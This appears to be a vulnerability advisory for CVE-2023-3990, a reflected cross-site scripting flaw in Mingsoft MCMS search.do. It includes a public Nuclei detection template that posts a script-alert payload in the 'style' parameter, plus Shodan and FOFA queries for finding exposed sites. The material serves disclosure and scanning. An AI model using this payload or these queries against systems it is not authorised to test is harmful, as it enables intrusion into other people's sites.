CVE-2023-3990: Mingsoft MCMS < 5.3.1 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: Mingsoft MCMS | PoC: public

Vulnerability description

A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.

PoC code [public]

id: CVE-2023-3990

info:
  name: Mingsoft MCMS < 5.3.1 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    We recommend that you update to the latest version 5.4 or above.
  reference:
    - https://gitee.com/mingSoft/MCMS/issues/I7K4DQ
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3990
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-3990
    cwe-id: CWE-79
    epss-score: 0.10685
    epss-percentile: 0.93041
    cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: mingsoft
    product: mcms
    shodan-query: http.favicon.hash:1464851260
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2023,mingsoft,mcms,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "mingsoft.net"
        internal: true

  - raw:
      - |
        POST /mcms/search.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        content_title=1&style=%3CScRiPt%3Ealert(document.domain)%3C%2FScRiPt%3Ealert

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<ScRiPt>alert(document.domain)</ScRiPt>alert"

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402207f8c51d66784c54937c53bfb15760d2de83871460388a0760ec69c684996802b02202c333b939bdcf526508182dc84ded61dd00956dd60f7c28649b0777d31f87d75:922c64590222798bb761d5b6d8e72950
